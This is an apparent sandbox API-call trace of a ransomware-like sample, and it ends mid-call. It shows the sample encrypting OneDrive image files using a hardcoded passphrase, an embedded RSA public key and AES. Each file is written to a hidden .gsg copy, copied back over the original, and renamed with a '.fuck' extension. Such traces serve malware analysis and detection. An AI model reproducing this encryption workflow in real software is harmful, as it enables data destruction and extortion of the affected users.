CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.015] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.015] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.015] CryptHashData (hHash=0x2fa748, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.015] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.015] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.015] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.015] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2aeb0) returned 1 [0277.016] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2aeb0, dwCertEncodingType=0x1, pInfo=0x2f355c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f355f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f355f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb948) returned 1 [0277.016] CryptEncrypt (in: hKey=0x2fb948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.016] CryptEncrypt (in: hKey=0x2fb948, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2ada0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2ada0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.016] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2ada0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2ada0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.017] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x184, lpOverlapped=0x0) returned 1 [0277.019] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x184, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x190) returned 1 [0277.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x190, lpOverlapped=0x0) returned 1 [0277.019] CloseHandle (hObject=0x5d48) returned 1 [0277.019] CloseHandle (hObject=0x5d3c) returned 1 [0277.019] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg"), bFailIfExists=0) returned 1 [0277.023] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg", dwFileAttributes=0x0) returned 1 [0277.024] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg.gsg")) returned 1 [0277.025] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\checkmark_selected.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\checkmark_selected.svg.fuck")) returned 1 [0277.026] CryptDestroyHash (hHash=0x2fa748) returned 1 [0277.026] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.026] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.026] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.026] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.026] GetLastError () returned 0x0 [0277.026] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg")) returned 0x20 [0277.027] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg", dwFileAttributes=0x80) returned 1 [0277.028] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.029] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.030] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.030] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.033] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.033] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.033] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.033] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.033] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.033] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.033] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ae28) returned 1 [0277.034] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ae28, dwCertEncodingType=0x1, pInfo=0x2f35d10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35d40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35d48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb708) returned 1 [0277.034] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.034] CryptEncrypt (in: hKey=0x2fb708, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2af38*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2af38*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.034] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2af38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2af38*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.035] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x127, lpOverlapped=0x0) returned 1 [0277.037] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x127, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x130) returned 1 [0277.037] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x130, lpOverlapped=0x0) returned 1 [0277.037] CloseHandle (hObject=0x5d3c) returned 1 [0277.037] CloseHandle (hObject=0x5d48) returned 1 [0277.038] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg"), bFailIfExists=0) returned 1 [0277.042] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg", dwFileAttributes=0x0) returned 1 [0277.042] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg.gsg")) returned 1 [0277.043] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevron.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevron.svg.fuck")) returned 1 [0277.044] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.044] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.044] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.044] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.045] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.045] GetLastError () returned 0x0 [0277.045] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg")) returned 0x20 [0277.045] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg", dwFileAttributes=0x80) returned 1 [0277.045] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.046] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.047] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.047] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.050] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.050] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.050] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.050] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.050] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.050] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.050] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c148) returned 1 [0277.051] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c148, dwCertEncodingType=0x1, pInfo=0x2f35690*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f356c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f356c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb1c8) returned 1 [0277.051] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.051] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c500*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c500*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2c500*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c500*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x108, lpOverlapped=0x0) returned 1 [0277.054] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x108, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x110) returned 1 [0277.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x110, lpOverlapped=0x0) returned 1 [0277.054] CloseHandle (hObject=0x5d48) returned 1 [0277.054] CloseHandle (hObject=0x5d3c) returned 1 [0277.054] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg"), bFailIfExists=0) returned 1 [0277.057] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg", dwFileAttributes=0x0) returned 1 [0277.058] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg.gsg")) returned 1 [0277.059] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\chevronUp.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\chevronup.svg.fuck")) returned 1 [0277.061] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.061] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.061] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.061] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.061] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.061] GetLastError () returned 0x0 [0277.061] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg")) returned 0x20 [0277.062] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg", dwFileAttributes=0x80) returned 1 [0277.062] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.063] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\cloud.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.064] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\cloud.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.065] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.067] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.067] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.067] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.067] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.067] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.067] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.067] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c478) returned 1 [0277.068] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c478, dwCertEncodingType=0x1, pInfo=0x2f35900*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35930*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35938*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb208) returned 1 [0277.068] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.068] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c9c8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c9c8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.068] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c9c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c9c8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.070] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, 